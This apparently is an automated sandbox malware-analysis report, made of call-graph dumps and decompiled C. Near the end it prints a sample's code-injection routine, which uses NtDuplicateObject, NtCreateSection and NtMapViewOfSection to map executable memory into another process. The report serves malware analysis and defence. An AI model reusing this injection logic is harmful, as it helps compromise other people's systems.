RtlAllocateHeap _realloc 11779->11786 11787 40989a _realloc 3 API calls 11780->11787 11781 40989a _realloc 3 API calls 11788 40b430 11781->11788 11789 40989a _realloc 3 API calls 11782->11789 11790 40b3f7 11783->11790 11784 40989a _realloc 3 API calls 11784->11779 11791 40b418 11785->11791 11786->11779 11792 40b47d 11787->11792 11793 40989a _realloc 3 API calls 11788->11793 11794 40b4fa 11789->11794 11799 413abd 11790->11799 11815 4138ae 11791->11815 11797 40989a _realloc 3 API calls 11792->11797 11793->11770 11794->11768 11797->11772 11798->11781 11800 413aca 11799->11800 11814 413b47 11799->11814 11801 40989a _realloc 3 API calls 11800->11801 11802 413adb 11800->11802 11801->11802 11803 40989a _realloc 3 API calls 11802->11803 11805 413aed 11802->11805 11803->11805 11804 413aff 11807 413b11 11804->11807 11809 40989a _realloc 3 API calls 11804->11809 11805->11804 11806 40989a _realloc 3 API calls 11805->11806 11806->11804 11808 413b23 11807->11808 11810 40989a _realloc 3 API calls 11807->11810 11811 413b35 11808->11811 11812 40989a _realloc 3 API calls 11808->11812 11809->11807 11810->11808 11813 40989a _realloc 3 API calls 11811->11813 11811->11814 11812->11811 11813->11814 11814->11778 11816 4138bb 11815->11816 11822 4138ef 11815->11822 11817 4138cb 11816->11817 11818 40989a _realloc 3 API calls 11816->11818 11819 40989a _realloc 3 API calls 11817->11819 11820 4138dd 11817->11820 11818->11817 11819->11820 11821 40989a _realloc 3 API calls 11820->11821 11820->11822 11821->11822 11822->11798 11824 4136b1 11823->11824 11910 40b4a8 11823->11910 11825 40989a _realloc 3 API calls 11824->11825 11826 4136b9 11825->11826 11827 40989a _realloc 3 API calls 11826->11827 11828 4136c1 11827->11828 11829 40989a _realloc 3 API calls 11828->11829 11830 4136c9 11829->11830 11831 40989a _realloc 3 API calls 11830->11831 11832 4136d1 11831->11832 11833 40989a _realloc 3 API calls 11832->11833 11834 4136d9 11833->11834 11835 40989a _realloc 3 API calls 11834->11835 11836 4136e1 11835->11836 11837 40989a _realloc 3 API calls 11836->11837 11838 4136e8 11837->11838 11839 40989a _realloc 3 API calls 11838->11839 11840 4136f0 11839->11840 11841 40989a _realloc 3 API calls 11840->11841 11842 4136f8 11841->11842 11843 40989a _realloc 3 API calls 11842->11843 11844 413700 11843->11844 11845 40989a _realloc 3 API calls 11844->11845 11846 413708 11845->11846 11847 40989a _realloc 3 API calls 11846->11847 11848 413710 11847->11848 11849 40989a _realloc 3 API calls 11848->11849 11850 413718 11849->11850 11851 40989a _realloc 3 API calls 11850->11851 11852 413720 11851->11852 11853 40989a _realloc 3 API calls 11852->11853 11854 413728 11853->11854 11855 40989a _realloc 3 API calls 11854->11855 11856 413730 11855->11856 11857 40989a _realloc 3 API calls 11856->11857 11858 41373b 11857->11858 11859 40989a _realloc 3 API calls 11858->11859 11860 413743 11859->11860 11861 40989a _realloc 3 API calls 11860->11861 11862 41374b 11861->11862 11863 40989a _realloc 3 API calls 11862->11863 11864 413753 11863->11864 11865 40989a _realloc 3 API calls 11864->11865 11866 41375b 11865->11866 11867 40989a _realloc 3 API calls 11866->11867 11868 413763 11867->11868 11869 40989a _realloc 3 API calls 11868->11869 11870 41376b 11869->11870 11871 40989a _realloc 3 API calls 11870->11871 11872 413773 11871->11872 11873 40989a _realloc 3 API calls 11872->11873 11874 41377b 11873->11874 11875 40989a _realloc 3 API calls 11874->11875 11876 413783 11875->11876 11877 40989a _realloc 3 API calls 11876->11877 11878 41378b 11877->11878 11879 40989a _realloc 3 API calls 11878->11879 11880 413793 11879->11880 11881 40989a _realloc 3 API calls 11880->11881 11882 41379b 11881->11882 11883 40989a _realloc 3 API calls 11882->11883 11884 4137a3 11883->11884 11885 40989a _realloc 3 API calls 11884->11885 11886 4137ab 11885->11886 11887 40989a _realloc 3 API calls 11886->11887 11888 4137b3 11887->11888 11889 40989a _realloc 3 API calls 11888->11889 11890 4137c1 11889->11890 11891 40989a _realloc 3 API calls 11890->11891 11892 4137cc 11891->11892 11893 40989a _realloc 3 API calls 11892->11893 11894 4137d7 11893->11894 11895 40989a _realloc 3 API calls 11894->11895 11896 4137e2 11895->11896 11897 40989a _realloc 3 API calls 11896->11897 11898 4137ed 11897->11898 11899 40989a _realloc 3 API calls 11898->11899 11900 4137f8 11899->11900 11901 40989a _realloc 3 API calls 11900->11901 11902 413803 11901->11902 11903 40989a _realloc 3 API calls 11902->11903 11904 41380e 11903->11904 11905 40989a _realloc 3 API calls 11904->11905 11906 413819 11905->11906 11907 40989a _realloc 3 API calls 11906->11907 11908 413824 11907->11908 11909 40989a _realloc 3 API calls 11908->11909 11909->11910 11910->11784 11912 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 11911->11912 11913 412a01 11912->11913 11921 412834 11913->11921 11915 411fa4 11916 40a55c 11915->11916 11917 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 11916->11917 11918 40a56f 11917->11918 11979 40a1b7 11918->11979 11920 40a58f 11920->11578 11923 412855 11921->11923 11922 412967 11938 412553 11922->11938 11923->11922 11929 41286d 11923->11929 11925 41298b 11926 412961 ___strgtold12_l 11925->11926 11927 4129ac 11925->11927 11942 41259c 11925->11942 11926->11915 11927->11926 11931 40989a _realloc 3 API calls 11927->11931 11929->11926 11930 40d2b2 _malloc 3 API calls 11929->11930 11933 4128fb _memset 11929->11933 11930->11933 11931->11926 11933->11926 11934 40a110 11933->11934 11935 40a11c 11934->11935 11936 40a12d 11934->11936 11935->11936 11937 40989a _realloc 3 API calls 11935->11937 11936->11926 11937->11936 11939 41257d 11938->11939 11940 412581 ___strgtold12_l 11939->11940 11952 418abd 11939->11952 11940->11925 11943 412666 ___strgtold12_l 11942->11943 11944 4125dc _strlen 11942->11944 11943->11927 11944->11943 11945 40d2b2 _malloc 3 API calls 11944->11945 11946 41263e _memset 11944->11946 11945->11946 11946->11943 11947 4126ba 11946->11947 11949 40afea __calloc_crt 3 API calls 11946->11949 11948 40a110 __freea 3 API calls 11947->11948 11948->11943 11950 4126fe 11949->11950 11950->11947 11951 40989a _realloc 3 API calls 11950->11951 11951->11947 11955 4193eb 11952->11955 11956 419404 11955->11956 11959 4191bc 11956->11959 11958 418ace 11958->11940 11960 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 11959->11960 11963 4191d1 11960->11963 11961 4191e3 11962 40b118 _realloc 3 API calls 11961->11962 11964 4191e8 strtoxl 11962->11964 11963->11961 11966 419220 11963->11966 11964->11958 11967 419265 11966->11967 11969 41277c 11966->11969 11967->11964 11968 40b118 _realloc 3 API calls 11967->11968 11968->11964 11970 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 11969->11970 11971 412790 11970->11971 11975 41279d 11971->11975 11976 416fa8 11971->11976 11974 4129ee ___crtGetStringTypeA 3 API calls 11974->11975 11975->11966 11977 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 11976->11977 11978 4127c5 11977->11978 11978->11974 11980 40a1d8 LCMapStringW 11979->11980 11982 40a1f3 11979->11982 11980->11982 11981 40a3f1 11983 412553 ___ansicp 3 API calls 11981->11983 11982->11981 11987 40a24d 11982->11987 11984 40a419 11983->11984 11985 40a3e8 ___strgtold12_l 11984->11985 11986 41259c ___convertcp 3 API calls 11984->11986 11989 40a469 11984->11989 11985->11920 11995 40a444 11986->11995 11987->11985 11990 40d2b2 _malloc 3 API calls 11987->11990 11997 40a2ac 11987->11997 11988 40a534 11988->11985 11993 40989a _realloc 3 API calls 11988->11993 11989->11988 11991 40989a _realloc 3 API calls 11989->11991 11990->11997 11991->11988 11992 40a327 11994 40a110 __freea 3 API calls 11992->11994 11993->11985 11994->11985 11995->11985 11995->11989 11996 40d2b2 _malloc 3 API calls 11995->11996 11998 40a481 _memset 11995->11998 11996->11998 11997->11985 11997->11992 12000 40d2b2 _malloc 3 API calls 11997->12000 12004 40a36b 11997->12004 11998->11989 11999 40a4db 11998->11999 12001 41259c ___convertcp 3 API calls 11998->12001 12002 40a110 __freea 3 API calls 11999->12002 12000->12004 12001->11999 12002->11989 12003 40a110 __freea 3 API calls 12003->11992 12004->11992 12004->12003 13356 40c2b8 13357 40c2c4 _realloc 13356->13357 13358 40c2ee 13357->13358 13359 40c2cf 13357->13359 13361 40daac __getptd 3 API calls 13358->13361 13360 40b118 _realloc 3 API calls 13359->13360 13379 40c2d4 strtoxl _sync_legacy_variables_lk _realloc _setlocale 13360->13379 13362 40c2f3 13361->13362 13363 40b68c _localeconv 3 API calls 13362->13363 13364 40c2fd 13363->13364 13365 40afea __calloc_crt 3 API calls 13364->13365 13366 40c310 13365->13366 13367 40dfbf __lock 3 API calls 13366->13367 13366->13379 13368 40c326 __copytlocinfo_nolock _setlocale 13367->13368 13380 40c09d 13368->13380 13370 40c34d 13371 40c359 ___TypeMatch 13370->13371 13372 40c3fd ___removelocaleref 13370->13372 13373 40dfbf __lock 3 API calls 13371->13373 13375 40b3b7 ___freetlocinfo 3 API calls 13372->13375 13374 40c382 13373->13374 13376 40b64e _setlocale 3 API calls 13374->13376 13375->13379 13377 40c394 ___removelocaleref 13376->13377 13378 40b64e _setlocale 3 API calls 13377->13378 13377->13379 13378->13379 13381 40c0c6 13380->13381 13386 40c0e2 13380->13386 13388 40c0d0 ___strgtold12_l 13381->13388 13394 40bd9b 13381->13394 13382 40c219 13382->13388 13428 40b9ed 13382->13428 13384 40c233 13412 40bb6a 13384->13412 13386->13382 13386->13384 13392 40c117 _strpbrk __invoke_watson _strncmp _strcspn _strlen 13386->13392 13388->13370 13389 40c248 ___TypeMatch 13389->13382 13389->13388 13390 40bd9b __setlocale_set_cat 3 API calls 13389->13390 13390->13389 13391 413e88 __NMSG_WRITE 3 API calls 13391->13392 13392->13382 13392->13388 13392->13391 13393 40bd9b __setlocale_set_cat 3 API calls 13392->13393 13393->13392 13395 40daac __getptd 3 API calls 13394->13395 13396 40bdb9 13395->13396 13397 40bb6a __expandlocale 3 API calls 13396->13397 13398 40bde4 ___TypeMatch _strlen 13397->13398 13399 40afa5 __malloc_crt 3 API calls 13398->13399 13411 40bdeb ___strgtold12_l 13398->13411 13400 40be2f _realloc 13399->13400 13401 40d1fb _strcpy_s 3 API calls 13400->13401 13400->13411 13402 40bea0 __invoke_watson _realloc 13401->13402 13404 4129ee ___crtGetStringTypeA 3 API calls 13402->13404 13407 40bf97 _memcmp 13402->13407 13403 40c00a 13405 40989a _realloc 3 API calls 13403->13405 13404->13407 13405->13411 13406 40c03b 13408 40989a _realloc 3 API calls 13406->13408 13406->13411 13407->13403 13407->13406 13409 40c066 13408->13409 13410 40989a _realloc 3 API calls 13409->13410 13410->13411 13411->13388 13413 40daac __getptd 3 API calls 13412->13413 13414 40bba5 13413->13414 13415 40bc07 __invoke_watson ___strgtold12_l 13414->13415 13416 40bbf4 13414->13416 13420 40bc45 ___TypeMatch _strlen 13414->13420 13415->13389 13417 40d1fb _strcpy_s 3 API calls 13416->13417 13417->13415 13419 40bc9b 13419->13415 13454 4144f8 13419->13454 13423 40bd09 __invoke_watson _realloc 13420->13423 13447 40b857 13420->13447 13425 40d1fb _strcpy_s 3 API calls 13423->13425 13425->13415 13427 413e88 __NMSG_WRITE 3 API calls 13427->13423 13429 40afa5 __malloc_crt 3 API calls 13428->13429 13430 40ba06 13429->13430 13431 40b817 __strcats 3 API calls 13430->13431 13446 40bb02 13430->13446 13434 40ba41 __invoke_watson ___TypeMatch 13431->13434 13432 413e14 _strcat_s 3 API calls 13432->13434 13433 40b817 __strcats 3 API calls 13433->13434 13434->13432 13434->13433 13435 40bac9 13434->13435 13436 40bb18 13435->13436 13438 40bacf 13435->13438 13437 40989a _realloc 3 API calls 13436->13437 13442 40bb20 13437->13442 13439 40baeb 13438->13439 13440 40989a _realloc 3 API calls 13438->13440 13441 40989a _realloc 3 API calls 13439->13441 13439->13446 13440->13439 13441->13446 13443 40bb3f 13442->13443 13444 40989a _realloc 3 API calls 13442->13444 13445 40989a _realloc 3 API calls 13443->13445 13443->13446 13444->13443 13445->13446 13446->13388 13448 40b870 _memset 13447->13448 13449 40b88e 13448->13449 13451 40b87c __invoke_watson 13448->13451 13453 40b8bb __invoke_watson _strcspn 13448->13453 13450 413e88 __NMSG_WRITE 3 API calls 13449->13450 13450->13451 13451->13419 13452 413e88 __NMSG_WRITE 3 API calls 13452->13453 13453->13451 13453->13452 13455 40daac __getptd 3 API calls 13454->13455 13458 414505 _GetLcidFromLangCountry _GetLcidFromLanguage _TranslateName _strlen 13455->13458 13457 414605 13459 40bcb3 13457->13459 13460 40d1fb _strcpy_s 3 API calls 13457->13460 13461 41468d __invoke_watson 13457->13461 13458->13459 13470 413f9f 13458->13470 13459->13415 13463 40b980 13459->13463 13460->13461 13461->13459 13474 40d1d1 13461->13474 13464 40d1fb _strcpy_s 3 API calls 13463->13464 13465 40b996 __invoke_watson 13464->13465 13467 40b9c6 13465->13467 13487 40b817 13465->13487 13468 40b9e8 13467->13468 13469 40b817 __strcats 3 API calls 13467->13469 13468->13427 13469->13468 13471 413fb8 ___TypeMatch 13470->13471 13472 413ffd ___strgtold12_l 13471->13472 13473 418abd ___ansicp 3 API calls 13471->13473 13472->13457 13473->13472 13475 40d1df 13474->13475 13478 40d0f4 13475->13478 13477 40d1f9 13477->13459 13479 40d122 13478->13479 13480 40d104 13478->13480 13482 40d128 13479->13482 13485 40d156 13479->13485 13481 40b118 _realloc 3 API calls 13480->13481 13486 40d109 strtoxl 13481->13486 13483 40b118 _realloc 3 API calls 13482->13483 13483->13486 13484 40b118 _realloc 3 API calls 13484->13486 13485->13484 13485->13486 13486->13477 13489 40b827 __invoke_watson 13487->13489 13490 40b852 13487->13490 13488 413e14 _strcat_s 3 API calls 13488->13489 13489->13488 13489->13490 13490->13467 13515 409f3c 13518 409eb6 13515->13518 13517 409f54 13519 409ec2 _realloc 13518->13519 13520 409ed0 13519->13520 13521 409eed _vscanf 13519->13521 13522 40b118 _realloc 3 API calls 13520->13522 13523 4104e5 _vscanf 3 API calls 13521->13523 13524 409ed5 strtoxl _vscanf _realloc 13522->13524 13523->13524 13524->13517 12993 418cbc 12994 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 12993->12994 12995 418cd0 12994->12995 12996 418d05 12995->12996 12997 418cd7 12995->12997 12999 418d0d 12996->12999 13003 418d38 12996->13003 12998 40b118 _realloc 3 API calls 12997->12998 13002 418cdc strtoxl ___ascii_stricmp 12998->13002 13000 40b118 _realloc 3 API calls 12999->13000 13000->13002 13001 417c9d LCMapStringW RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __tolower_l 13001->13003 13003->13001 13003->13002

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 40156b-4015b0 call 401271 9 4015b2 0->9 10 4015b5-4015ba 0->10 9->10 12 4015c0-4015d1 10->12 13 4018d8-4018e0 10->13 16 4018d6 12->16 17 4015d7-401600 12->17 13->10 18 4018e5-401912 call 401271 13->18 16->18 17->16 26 401606-40161d NtDuplicateObject 17->26 26->16 28 401623-401647 NtCreateSection 26->28 30 4016a3-4016c9 NtCreateSection 28->30 31 401649-40166a NtMapViewOfSection 28->31 30->16 34 4016cf-4016d3 30->34 31->30 33 40166c-401688 NtMapViewOfSection 31->33 33->30 36 40168a-4016a0 33->36 34->16 35 4016d9-4016fa NtMapViewOfSection 34->35 35->16 37 401700-40171c NtMapViewOfSection 35->37 36->30 37->16 38 401722 37->38 38->16 40 401722 call 401727 38->40 40->16
                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                    			E0040156B(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				void* _v8;
                                                                                                                                    				long _v12;
                                                                                                                                    				void* _v16;
                                                                                                                                    				void* _v20;
                                                                                                                                    				char _v44;
                                                                                                                                    				char _v52;
                                                                                                                                    				long _v56;
                                                                                                                                    				long _v60;
                                                                                                                                    				char _v64;
                                                                                                                                    				char _v68;
                                                                                                                                    				char _v72;
                                                                                                                                    				char _v76;
                                                                                                                                    				char _v84;
                                                                                                                                    				char _v88;
                                                                                                                                    				char _v92;
                                                                                                                                    				intOrPtr _v96;
                                                                                                                                    				char _v100;
                                                                                                                                    				void* _v288;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				intOrPtr _t88;
                                                                                                                                    				long _t91;
                                                                                                                                    				struct _GUID _t99;
                                                                                                                                    				struct _GUID _t101;
                                                                                                                                    				PVOID* _t103;
                                                                                                                                    				PVOID* _t105;
                                                                                                                                    				PVOID* _t122;
                                                                                                                                    				PVOID* _t124;
                                                                                                                                    				void* _t128;
                                                                                                                                    				intOrPtr _t129;
                                                                                                                                    				long* _t132;
                                                                                                                                    				void* _t174;
                                                                                                                                    				long _t175;
                                                                                                                                    				long* _t182;
                                                                                                                                    				intOrPtr* _t183;
                                                                                                                                    				HANDLE* _t184;
                                                                                                                                    				HANDLE* _t185;
                                                                                                                                    				intOrPtr _t198;
                                                                                                                                    				void* _t199;
                                                                                                                                    				void* _t200;
                                                                                                                                    				long _t218;
                                                                                                                                    				void* _t223;
                                                                                                                                    
                                                                                                                                    				_t223 = __fp0;
                                                                                                                                    				_push(0x36c);
                                                                                                                                    				_t200 = _t199 + 4;
                                                                                                                                    				L00401271(0x15a2, _t128, _t174, __eflags);
                                                                                                                                    				_t129 = _a4;
                                                                                                                                    				_t175 = 0;
                                                                                                                                    				_v56 = 0;
                                                                                                                                    				if(gs != 0) {
                                                                                                                                    					_v56 = _v56 + 1;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					_t88 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                                                                    					if(_t88 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                                                                    				}
                                                                                                                                    				_v96 = _t88;
                                                                                                                                    				_t182 =  &_v100;
                                                                                                                                    				 *_t182 = _t175;
                                                                                                                                    				 *((intOrPtr*)(_t129 + 0x4c))(_t88, _t182);
                                                                                                                                    				_t91 =  *_t182;
                                                                                                                                    				if(_t91 == 0) {
                                                                                                                                    					L63:
                                                                                                                                    					return L00401271(0x15a2, _t129, _t175, _t222);
                                                                                                                                    				}
                                                                                                                                    				_t132 =  &_v52;
                                                                                                                                    				 *_t132 = _t91;
                                                                                                                                    				_t132[1] = _t175;
                                                                                                                                    				_t183 =  &_v44;
                                                                                                                                    				 *((intOrPtr*)(_t129 + 0x10))(_t183, 0x18);
                                                                                                                                    				 *_t183 = 0x18;
                                                                                                                                    				_push( &_v52);
                                                                                                                                    				_push(_t183);
                                                                                                                                    				_push(0x40);
                                                                                                                                    				_push( &_v20);
                                                                                                                                    				if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t175, _t175, 2) == 0) {
                                                                                                                                    					_v12 = _t175;
                                                                                                                                    					_t99 =  &_v84;
                                                                                                                                    					 *(_t99 + 4) = _t175;
                                                                                                                                    					 *_t99 = 0x5000;
                                                                                                                                    					_t184 =  &_v88;
                                                                                                                                    					if(NtCreateSection(_t184, 6, _t175, _t99, 4, 0x8000000, _t175) == 0) {
                                                                                                                                    						_push(_v84);
                                                                                                                                    						_pop( *_t25);
                                                                                                                                    						_t122 =  &_v72;
                                                                                                                                    						 *_t122 = _t175;
                                                                                                                                    						if(NtMapViewOfSection( *_t184, 0xffffffff, _t122, _t175, _t175, _t175,  &_v60, 1, _t175, 4) == 0) {
                                                                                                                                    							_t124 =  &_v64;
                                                                                                                                    							 *_t124 = _t175;
                                                                                                                                    							if(NtMapViewOfSection( *_t184, _v16, _t124, _t175, _t175, _t175,  &_v60, 1, _t175, 4) == 0) {
                                                                                                                                    								_t198 = _v72;
                                                                                                                                    								 *((intOrPtr*)(_t129 + 0x20))(_t175, _t198, 0x104);
                                                                                                                                    								 *((intOrPtr*)(_t198 + 0x208)) = _a16;
                                                                                                                                    								_v12 = _v12 + 1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t101 =  &_v84;
                                                                                                                                    					 *(_t101 + 4) = _t175;
                                                                                                                                    					 *_t101 = _a12 + 0x10000;
                                                                                                                                    					_t185 =  &_v92;
                                                                                                                                    					if(NtCreateSection(_t185, 0xe, _t175, _t101, 0x40, 0x8000000, _t175) == 0) {
                                                                                                                                    						while(_v12 != 0) {
                                                                                                                                    							_push(_v84);
                                                                                                                                    							_pop( *_t46);
                                                                                                                                    							_t103 =  &_v76;
                                                                                                                                    							 *_t103 = _t175;
                                                                                                                                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t103, _t175, _t175, _t175,  &_v60, 1, _t175, 4) != 0) {
                                                                                                                                    								goto L63;
                                                                                                                                    							}
                                                                                                                                    							_t105 =  &_v68;
                                                                                                                                    							 *_t105 = _t175;
                                                                                                                                    							_t218 = NtMapViewOfSection( *_t185, _v16, _t105, _t175, _t175, _t175,  &_v60, 1, _t175, 0x20);
                                                                                                                                    							if(_t218 != 0) {
                                                                                                                                    								goto L63;
                                                                                                                                    							}
                                                                                                                                    							L21();
                                                                                                                                    							if(_t218 != 0 || _t218 == 0) {
                                                                                                                                    								L25:
                                                                                                                                    								asm("lodsb");
                                                                                                                                    								goto L43;
                                                                                                                                    								asm("loop 0xffffffc7");
                                                                                                                                    								switch(0x4017c8) {
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t218 < 0) {
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    								asm("cmpsd");
                                                                                                                                    								_t200 = _t200 - 1;
                                                                                                                                    								goto L25;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}













































                                                                                                                                    0x0040156b
                                                                                                                                    0x0040158b
                                                                                                                                    0x00401593
                                                                                                                                    0x0040159d
                                                                                                                                    0x004015a2
                                                                                                                                    0x004015a5
                                                                                                                                    0x004015a7
                                                                                                                                    0x004015b0
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b2
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015b5
                                                                                                                                    0x004015ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004018dd
                                                                                                                                    0x004018dd
                                                                                                                                    0x004015c0
                                                                                                                                    0x004015c3
                                                                                                                                    0x004015c6
                                                                                                                                    0x004015ca
                                                                                                                                    0x004015cd
                                                                                                                                    0x004015d1
                                                                                                                                    0x004018d6
                                                                                                                                    0x00000000
                                                                                                                                    0x00401909
                                                                                                                                    0x004015d7
                                                                                                                                    0x004015da
                                                                                                                                    0x004015dc
                                                                                                                                    0x004015df
                                                                                                                                    0x004015e5
                                                                                                                                    0x004015e8
                                                                                                                                    0x004015f6
                                                                                                                                    0x004015f7
                                                                                                                                    0x004015f8
                                                                                                                                    0x004015fa
                                                                                                                                    0x00401600
                                                                                                                                    0x00401623
                                                                                                                                    0x00401626
                                                                                                                                    0x00401629
                                                                                                                                    0x0040162c
                                                                                                                                    0x00401632
                                                                                                                                    0x00401647
                                                                                                                                    0x00401649
                                                                                                                                    0x0040164c
                                                                                                                                    0x0040164f
                                                                                                                                    0x00401652
                                                                                                                                    0x0040166a
                                                                                                                                    0x0040166c
                                                                                                                                    0x0040166f
                                                                                                                                    0x00401688
                                                                                                                                    0x0040168a
                                                                                                                                    0x00401694
                                                                                                                                    0x0040169a
                                                                                                                                    0x004016a0
                                                                                                                                    0x004016a0
                                                                                                                                    0x00401688
                                                                                                                                    0x0040166a
                                                                                                                                    0x004016a3
                                                                                                                                    0x004016af
                                                                                                                                    0x004016b2
                                                                                                                                    0x004016b4
                                                                                                                                    0x004016c9
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016d9
                                                                                                                                    0x004016dc
                                                                                                                                    0x004016df
                                                                                                                                    0x004016e2
                                                                                                                                    0x004016fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401700
                                                                                                                                    0x00401703
                                                                                                                                    0x0040171a
                                                                                                                                    0x0040171c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00401722
                                                                                                                                    0x00401727
                                                                                                                                    0x0040172f
                                                                                                                                    0x004017a4
                                                                                                                                    0x004017a5
                                                                                                                                    0x004017b1
                                                                                                                                    0x004017c0
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172b
                                                                                                                                    0x0040172b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172d
                                                                                                                                    0x0040172e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040172e
                                                                                                                                    0x00401727
                                                                                                                                    0x004016cf
                                                                                                                                    0x004016c9

                                                                                                                                    APIs
                                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401683
                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C4
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F5
                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401717
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                    • Opcode ID: 52a7bd6609b09e3f64181f4a62f3e6ae527d8b12ecb64344e11fb61d3a63f3c8
                                                                                                                                    • Instruction ID: 4e6cf93ab59cf35e3a3a48edc2c016eb71cd13ef699383e81882b5db717c4c63
                                                                                                                                    • Opcode Fuzzy Hash: 52a7bd6609b09e3f64181f4a62f3e6ae527d8b12ecb64344e11fb61d3a63f3c8
                                                                                                                                    • Instruction Fuzzy Hash: DD514D71900208FBEB209F95CC49FAF7BB8FF85710F10412AF912BA2E5E6749901DB25
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 41 401581-4015b0 call 401271 50 4015b2 41->50 51 4015b5-4015ba 41->51 50->51 53 4015c0-4015d1 51->53 54 4018d8-4018e0 51->54 57 4018d6 53->57 58 4015d7-401600 53->58 54->51 59 4018e5-401912 call 401271 54->59 57->59 58->57 67 401606-40161d NtDuplicateObject 58->67 67->57 69 401623-401647 NtCreateSection 67->69 71 4016a3-4016c9 NtCreateSection 69->71 72 401649-40166a NtMapViewOfSection 69->72 71->57 75 4016cf-4016d3 71->75 72->71 74 40166c-401688 NtMapViewOfSection 72->74 74->71 77 40168a-4016a0 74->77 75->57 76 4016d9-4016fa NtMapViewOfSection 75->76 76->57 78 401700-40171c NtMapViewOfSection 76->78 77->71 78->57 79 401722 78->79 79->57 81 401722 call 401727 79->81 81->57
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E00401581(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
                                                                                                                                    				intOrPtr _t88;
                                                                                                                                    				long _t91;
                                                                                                                                    				void* _t93;
                                                                                                                                    				struct _GUID _t99;
                                                                                                                                    				struct _GUID _t101;
                                                                                                                                    				PVOID* _t103;
                                                                                                                                    				PVOID* _t105;
                                                                                                                                    				PVOID* _t122;
                                                                                                                                    				PVOID* _t124;
                                                                                                                                    				intOrPtr _t129;
                                                                                                                                    				long* _t133;
                                                                                                                                    				long _t176;
                                                                                                                                    				long* _t184;
                                                                                                                                    				intOrPtr* _t186;
                                                                                                                                    				HANDLE* _t187;
                                                                                                                                    				HANDLE* _t188;
                                                                                                                                    				void* _t201;
                                                                                                                                    				void* _t202;
                                                                                                                                    				void* _t204;
                                                                                                                                    				void* _t205;
                                                                                                                                    				long _t224;
                                                                                                                                    				void* _t229;
                                                                                                                                    
                                                                                                                                    				_t229 = __fp0;
                                                                                                                                    				asm("lodsb");
                                                                                                                                    				_push(0x36c);
                                                                                                                                    				_t205 = _t204 + 4;
                                                                                                                                    				L00401271(0x15a2, __ebx, __edi, __eflags);
                                                                                                                                    				_t129 =  *((intOrPtr*)(_t202 + 8));
                                                                                                                                    				_t176 = 0;
                                                                                                                                    				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                                                                                                                                    				if(gs != 0) {
                                                                                                                                    					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					_t88 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                                                                    					if(_t88 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                                                                    				}
